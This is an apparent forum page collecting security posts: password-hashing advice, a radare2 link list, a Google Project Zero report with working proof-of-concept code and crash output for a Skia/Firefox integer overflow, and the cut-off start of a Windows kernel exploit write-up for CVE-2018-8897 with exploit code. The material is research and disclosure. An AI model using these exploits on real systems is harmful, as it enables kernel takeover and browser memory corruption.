recommendation from security professionals for password hashing and key derivation. How does it fare with its execution time per password length? scrypt 1-128 characters scrypt 1-512 characters scrypt 1-4,096 characters I'm seeing a trend here. The Password Hashing Competition winner Argon2 In 2013, an open public competition, in the spirit of AES and SHA-3, was held to create a password hashing function that approached password security from what we knew with modern cryptography and password security. There were many interesting designs submitted, including a favorite of mine by Dr. Thomas Pornin of StackExchange fame and BearSSL, that used delegation to reduce the work load on the honest, while still making it expensive for the password cracker. In July 2015, the Argon2 algorithm was chosen as the winner of the competition. It comes with a clean approach of CPU and memory hardness, making the parameters easy to tweak, test, and benchmark. Even though the algorithm is relatively new, it has seen at least 5 years of analysis, as of this writing, and has quickly become the "Gold Standard" for password hashing. I fully recommend it for production use. Any bets on how it will execution times will be affected by password length? Let's look: Argon2 1-128 characters Argon2 1-512 characters Argon2 1-4,096 characters Execution time is not affected by password length. Imagine that. It's as if cryptographers know what they're doing when designing this stuff. Conclusion Ulrich Drepper tried creating something more secure than md5crypt, and ended up creating something worse. Don't use sha256crypt or sha512crypt; they're dangerous. For hashing passwords, in order of preference, use with an appropriate cost: Argon2 or scrypt (CPU and RAM hard) bcrypt or PBKDF2 (CPU hard only) Avoid practically everything else: md5crypt, sha256crypt, and sha512crypt Any generic cryptographic hashing function (MD5, SHA-1, SHA-2, SHA-3, BLAKE2, etc.) Any complex homebrew iterative design (10,000 iterations of salted SHA-256, etc.) Any encryption design (AES, Blowfish (ugh), ChaCha20, etc.) Acknowledgement Thanks to Steve Thomas (@Sc00bzT) for our discussions on Twitter for helping me see this quirky behavior with sha256crypt and sha512crypt. Posted by Aaron Toponce on Wednesday, May 23, 2018, at 6:56 am. Sursa: https://pthree.org/2018/05/23/do-not-use-sha256crypt-sha512crypt-theyre-dangerous/
  12. Table of Contents Serialization (marshaling): ............................................................................................................................ 4 Deserialization (unmarshaling): .................................................................................................................... 4 Programming language support serialization: ............................................................................................... 4 Risk for using serialization: .......................................................................................................................... 5 Serialization in Java ...................................................................................................................................... 6 Deserialization vulnerability in Java: ............................................................................................................ 6 Code flow work........................................................................................................................................... 11 Vulnerability Detection: .............................................................................................................................. 12 CVE: ........................................................................................................................................................... 17 Tools: .......................................................................................................................................................... 17 Vulnerable libraries lead to RCE: ............................................................................................................... 18 Mitigation: .................................................................................................................................................. 19 Serialization in Python ................................................................................................................................ 20 Deserialization vulnerability in Python: ..................................................................................................... 21 Pickle instructions ....................................................................................................................................... 25 Exploit vulnerability: .................................................................................................................................. 26 CVE: ........................................................................................................................................................... 29 Mitigation: .................................................................................................................................................. 29 Serialization in PHP .................................................................................................................................... 30 Deserialization vulnerability in PHP: ......................................................................................................... 30 Exploit vulnerability: .................................................................................................................................. 35 CVE: ........................................................................................................................................................... 39 Mitigation: .................................................................................................................................................. 40 Serialization in Ruby ................................................................................................................................... 41 Deserialization vulnerability in Ruby: ........................................................................................................ 42 Detect and exploit vulnerability: ................................................................................................................ 44 CVE: ........................................................................................................................................................... 53 Tools: .......................................................................................................................................................... 53 Mitigation: .................................................................................................................................................. 53 Conclusion: ................................................................................................................................................. 56 Download: https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf?rss
      • 1
      • Upvote
  13. Mobile Security Updates: Understanding the Issues A Commission Report February 2018 FEDERAL TRADE COMMISSION Maureen K. Ohlhausen, Acting Chairman Terrell McSweeny, Commissioner Download: https://www.ftc.gov/system/files/documents/reports/mobile-security-updates-understanding-issues/mobile_security_updates_understanding_the_issues_publication_final.pdf
  14. Skia and Firefox: Integer overflow in SkTDArray leading to out-of-bounds write Project Member Reported by ifratric@google.com, Feb 28 Back to list Issue description Skia bug report: https://bugs.chromium.org/p/skia/issues/detail?id=7674 Mozilla bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1441941 In Skia, SkTDArray stores length (fCount) and capacity (fReserve) as 32-bit ints and does not perform any integer overflow checks. There are a couple of places where an integer overflow could occur: (1) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=369 (2) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=382 (3) https://cs.chromium.org/chromium/src/third_party/skia/include/private/SkTDArray.h?rcl=a93a14a99816d25b773f0b12868143702baf44bf&l=383 and possibly others In addition, on 32-bit systems, multiplication integer overflows could occur in several places where expressions such as fReserve * sizeof(T) sizeof(T) * count etc. are used. An integer overflow in (2) above is especially dangerous as it will cause too little memory to be allocated to hold the array which will cause a out-of-bounds write when e.g. appending an element. I have successfully demonstrated the issue by causing an overflow in fPts array in SkPathMeasure (https://cs.chromium.org/chromium/src/third_party/skia/include/core/SkPathMeasure.h?l=104&rcl=23d97760248300b7aec213a36f8b0485857240b5) which is used when rendering dashed paths. The PoC requires a lot of memory (My estimate is 16+1 GB for storing the path, additional 16GB for the SkTDArray we are corrupting), however there might be less demanding paths for triggering SkTDArray integer overflows. PoC program for Skia ================================================================= #include <stdio.h> #include "SkCanvas.h" #include "SkPath.h" #include "SkGradientShader.h" #include "SkBitmap.h" #include "SkDashPathEffect.h" int main (int argc, char * const argv[]) { SkBitmap bitmap; bitmap.allocN32Pixels(500, 500); //Create Canvas SkCanvas canvas(bitmap); SkPaint p; p.setAntiAlias(false); float intervals[] = { 0, 10e9f }; p.setStyle(SkPaint::kStroke_Style); p.setPathEffect(SkDashPathEffect::Make(intervals, SK_ARRAY_COUNT(intervals), 0)); SkPath path; unsigned quadraticarr[] = {13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613, 0}; path.moveTo(0, 0); unsigned numpoints = 1; unsigned i = 1; unsigned qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { path.quadTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { path.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { path.moveTo(0, 0); numpoints += 1; i = 1; } } printf("done building path\n"); canvas.drawPath(path, p); return 0; } ================================================================= ASan output: ASAN:DEADLYSIGNAL ================================================================= ==39779==ERROR: AddressSanitizer: SEGV on unknown address 0x7fefc321c7d8 (pc 0x7ff2dac9cf66 bp 0x7ffcb5a46540 sp 0x7ffcb5a45cc8 T0) #0 0x7ff2dac9cf65 (/lib/x86_64-linux-gnu/libc.so.6+0x83f65) #1 0x7bb66c in __asan_memcpy (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x7bb66c) #2 0xcb2a33 in SkTDArray<SkPoint>::append(int, SkPoint const*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/../private/SkTDArray.h:184:17 #3 0xcb8b9a in SkPathMeasure::buildSegments() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:341:21 #4 0xcbb5f4 in SkPathMeasure::getLength() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:513:9 #5 0xcbb5f4 in SkPathMeasure::nextContour() /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPathMeasure.cpp:688 #6 0x1805c14 in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/utils/SkDashPath.cpp:482:14 #7 0xe9cf60 in SkDashImpl::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/effects/SkDashPathEffect.cpp:40:12 #8 0xc8fbef in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkPaint.cpp:1500:24 #9 0xbdbc26 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1120:18 #10 0x169b16e in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:9 #11 0x169b16e in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:226 #12 0xb748d1 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2167:9 #13 0xb6b01a in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1757:5 #14 0x8031dc in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:49:5 #15 0x7ff2dac392b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #16 0x733519 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x733519) The issue can also be triggered via the web in Mozilla Firefox PoC for Mozilla Firefox on Linux (I used Firefox ASan build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer) ================================================================= <canvas id="canvas" width="64" height="64"></canvas> <br> <button onclick="go()">go</button> <script> var canvas = document.getElementById("canvas"); var ctx = canvas.getContext("2d"); function go() { ctx.beginPath(); ctx.mozImageSmoothingEnabled = false; ctx.webkitImageSmoothingEnabled = false; ctx.msImageSmoothingEnabled = false; ctx.imageSmoothingEnabled = false; linedasharr = [0, 1e+37]; ctx.setLineDash(linedasharr); quadraticarr = [13, 68, 258, 1053, 1323, 2608, 10018, 15668, 59838, 557493, 696873, 871098, 4153813, 15845608, 48357008, 118059138, 288230353, 360287948, 562949933, 703687423, 1099511613]; ctx.moveTo(0, 0); numpoints = 1; i = 1; qaindex = 0; while(numpoints < 2147483647) { if(numpoints == quadraticarr[qaindex]) { ctx.quadraticCurveTo(i, 0, i, 0); qaindex++; numpoints += 2; } else { ctx.lineTo(i, 0); numpoints += 1; } i++; if(i == 1000000) { ctx.moveTo(0, 0); numpoints += 1; i = 1; } } alert("done building path"); ctx.stroke(); alert("exploit failed"); } </script> ================================================================= ASan output: AddressSanitizer:DEADLYSIGNAL ================================================================= ==37732==ERROR: AddressSanitizer: SEGV on unknown address 0x7ff86d20e7d8 (pc 0x7ff7c1233701 bp 0x7fffd19dd5f0 sp 0x7fffd19dd420 T0) ==37732==The signal is caused by a WRITE memory access. #0 0x7ff7c1233700 in append /builds/worker/workspace/build/src/gfx/skia/skia/include/core/../private/SkTDArray.h:184:17 #1 0x7ff7c1233700 in SkPathMeasure::buildSegments() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:342 #2 0x7ff7c1235be1 in getLength /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:516:15 #3 0x7ff7c1235be1 in SkPathMeasure::nextContour() /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPathMeasure.cpp:688 #4 0x7ff7c112905e in SkDashPath::InternalFilter(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*, float const*, int, float, int, float, SkDashPath::StrokeRecApplication) /builds/worker/workspace/build/src/gfx/skia/skia/src/utils/SkDashPath.cpp:307:19 #5 0x7ff7c0bf9ed0 in SkDashPathEffect::filterPath(SkPath*, SkPath const&, SkStrokeRec*, SkRect const*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/effects/SkDashPathEffect.cpp:40:12 #6 0x7ff7c1210ed6 in SkPaint::getFillPath(SkPath const&, SkPath*, SkRect const*, float) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkPaint.cpp:1969:37 #7 0x7ff7c0ec9156 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1141:25 #8 0x7ff7c0b8de4b in drawPath /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.h:55:15 #9 0x7ff7c0b8de4b in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDevice.cpp:235 #10 0x7ff7c0bbc691 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /builds/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2227:23 #11 0x7ff7b86965b4 in mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12 #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11 #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13 #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13 #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15 #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467 #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14 #18 0x1a432b56061a (<unknown module>) This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1541
  15. Awesome Radare2 A curated list of awesome projects, articles and the other materials powered by Radare2. What is Radare2? Radare is a portable reversing framework that can... Disassemble (and assemble for) many different architectures Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...) Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku Perform forensics on filesystems and data carving Be scripted in Python, Javascript, Go and more Visualize data structures of several file types Patch programs to uncover new features or fix vulnerabilities Use powerful analysis capabilities to speed up reversing Aid in software exploitation More info here. Table of Contents Books Videos Recordings Asciinemas Conferences Slides Tutorials and Blogs Tools Scripts Contributing Awesome Radare2 Materials Books R2 "Book" Radare2 Explorations Radare2 wiki Videos Recordings Creating a keygen for FrogSek KGM#1 - by @binaryheadache Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007 Introduction To Reverse Engineering With Radare2 Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2 Asciinemas metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL Filter for string's searching (urls, emails) Manual unpacking UPX on linux 64-bit Conferences r2con 2017 LinuxDays 2017 - Disassembling with radare2 SUE 2017 - Reverse Engineering Embedded ARM Devices radare demystified (33c3) r2con 2016 Reversing with Radare2 - OverDrive Conference Radare2 & frida hack-a-ton 2015 Radare from A to Z 2015 Reverse engineering embedded software using Radare2 - Linux.conf.au 2015 OggCamp - Shellcode - vext01 Slides and Workshops Radare2 cheat-sheet r2m2 - radare2 + miasm2 = ♥ Radare2 Workshop 2015 (Defcon) Emulating Code In Radare2 Radare from A to Z 2015 Radare2 Workshop 2015 (Hack.lu) Radare2 & frida hack-a-ton 2015 radare2: evolution radare2: from forensics to bindiffing Tutorials and Blogs Linux Malware by @MalwareMustDie Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn Reverse engineering a Gameboy ROM with radare2 - by @megabeets_ radare2 as an alternative to gdb-peda How to find offsets for v0rtex (by Siguza) Debugging a Forking Server with r2 Defeating IOLI with radare2 in 2017 Using r2 to analyse Minidumps Android malware analysis with Radare: Dissecting the Triada Trojan Solving game2 from the badge of Black Alps 2017 with radare2 ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2 ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2 Reversing EVM bytecode with radare2 Radare2’s Visual Mode Crackme0x03 Dissected with Radare2 Crackme0x02 Dissected with Radare2 Crackme0x01 Dissected with Radare2 Debugging Using Radare2… and Windows! - by @jacob16682 Decrypting APT33’s Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_ A journey into Radare 2 – Part 2: Exploitation - by @megabeets_ A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_ Reverse Engineering With Radare2 - by @insinuator Write-ups from RHME3 pre-qualifications at RADARE2 conference Hackover CTF 2016 - tiny_backdoor writeup radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object Reversing and Exploiting Embedded Devices: The Software Stack (Part 1) Binary Bomb with Radare2 - by @binaryheadache crackserial_linux with radare2 - by @binaryheadache Examining malware with r2 - by @binaryheadache Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx Radare2 of the Lost Magic Gadget - by @0xabe_io Radare 2 in 0x1E minutes - by @superkojiman Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2 Baleful was a challenge relased in picoctf At Gunpoint Hacklu 2014 With Radare2 - by @crowell Pwning With Radare2 - by @crowell Solving ‘heap’ from defcon 2014 qualifier with r2 - by @alvaro_fe How to radare2 a fake openssh exploit - by jvoisin Disassembling 6502 code with Radare – Part I - by @ricardoquesada Disassembling 6502 code with Radare – Part II - by @ricardoquesada Unpacking shikata-ga-nai by scripting radare2 This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2 Raspberry PI hang instruction - by @pancake Solving avatao's "R3v3rs3 4" - by @sghctoma Reverse Engineering With Radare2, Part 1 - by @sam_symons Simple crackme with Radare2 - by @futex90 Pwning With Radare2 - by @crowell Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie ROPping to Victory ROPping to Victory - Part 2, split Tools Docker image encapsulates the reverse-engineering framework Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing rarop - graphical ROP chain builder using radare2 and r2pipe Radare2 and Frida better together Android APK analyzer based on radare2 Scripts helper radare2 script to analyze UEFI firmware modules ThinkPwn Scanner - by @d_olex and @trufae radare2-lldb integration create a YARA signature for the bytes of the current function A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr) Just a simple radare2 Jupyter kernel r2scapy - a radare2 plugin that decodes packets with Scapy A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table radare2 plugin - converts asm to pseudo-C code (experimental) A python script using radare2 for decrypt and patch the strings of GootKit malware Collection of scripts for radare2 for MIPS arch Extract functions and opcodes with radare2 - by @andrewaeva r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads Patch kextd using radare2 Python-r2pipe script that draws ascii and graphviz graphs of library dependencies Simple XOR DDOS strings deobfuscator - by @NighterMan Decode multiple shellcodes encoded with msfencode - by @NighterMan Baleful CTF task plugins Contributing Please refer the guidelines at contributing.md for details. Sursa: https://github.com/dukebarman/awesome-radare2
      • 1
      • Thanks
  16. Nu stiu cum e pe telefon, dar la Activity iti poti seta cum sa arate feed-ul personalizat.
  17. Si eu postez la fel uneori. Ideea e ca acele posturi sunt utile. Printre posturile lui @OKQL am gasit lucruri despre care nu stiam, si in general sunt la curent cum cam tot ce apare.
  18. 1. http://jsbeautifier.org/ 2. Inlocuiesti eval cu alert (de exemplu) 3. http://jsbeautifier.org/ 4. Ai din nou eval Nu am timp de mai mult momentan.
  19. Arbitrary Code Execution at Ring 0 using CVE-2018-8897 Can BölükMay 11, 201801017.9k Just a few days ago, a new vulnerability allowing an unprivileged user to run #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post. Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation. Final source code can be found at the bottom. 0x0: Setting Up the Basics The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode. We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted. All of this can be done in a few lines like shown below: #include <Windows.h> #include <iostream> void main() { static DWORD g_SavedSS = 0; _asm { mov ax, ss mov word ptr [ g_SavedSS ], ax } CONTEXT Ctx = { 0 }; Ctx.Dr0 = ( DWORD ) &g_SavedSS; Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ); Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; SetThreadContext( HANDLE( -2 ), &Ctx ); PVOID FakeGsBase = ...; _asm { mov eax, FakeGsBase ; Set eax to fake gs base push 0x23 push X64_End push 0x33 push X64_Start retf X64_Start: __emit 0xf3 ; wrgsbase eax __emit 0x0f __emit 0xae __emit 0xd8 retf X64_End: ; Vulnerability mov ss, word ptr [ g_SavedSS ] ; Defer debug exception int 3 ; Execute with interrupts disabled nop } } This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit. Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx. We can utilize a small IDA script to step to relevant parts faster: #include <idc.idc> static main() { Message( "--- Step Till Next GS ---\n" ); while( 1 ) { auto Disasm = GetDisasmEx( GetEventEa(), 1 ); if ( strstr( Disasm, "gs:" ) >= Disasm ) break; StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); } } 0x1: Fixing the KPCR Data Here are the few cases we have to modify GSBASE contents to pass through successfully: – KiDebugTrapOrFault KiDebugTrapOrFault: ... MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80. – KiExceptionDispatch KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8 Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h. – KiDispatchException KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h] This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it. KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h] 0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it. – RtlDispatchException This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do? There’s a weird check in the middle of the function: char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; } Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException. – KeBugCheckEx We are finally here. Here’s the last thing we need to fix: MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now. 0x2: and Write|What|Where And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time. I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit: #include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } } To my disappointment, there is no convenient jumps or calls. The whole output is: - KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it. I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses: NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit). However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made. .text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... .text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4. To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This 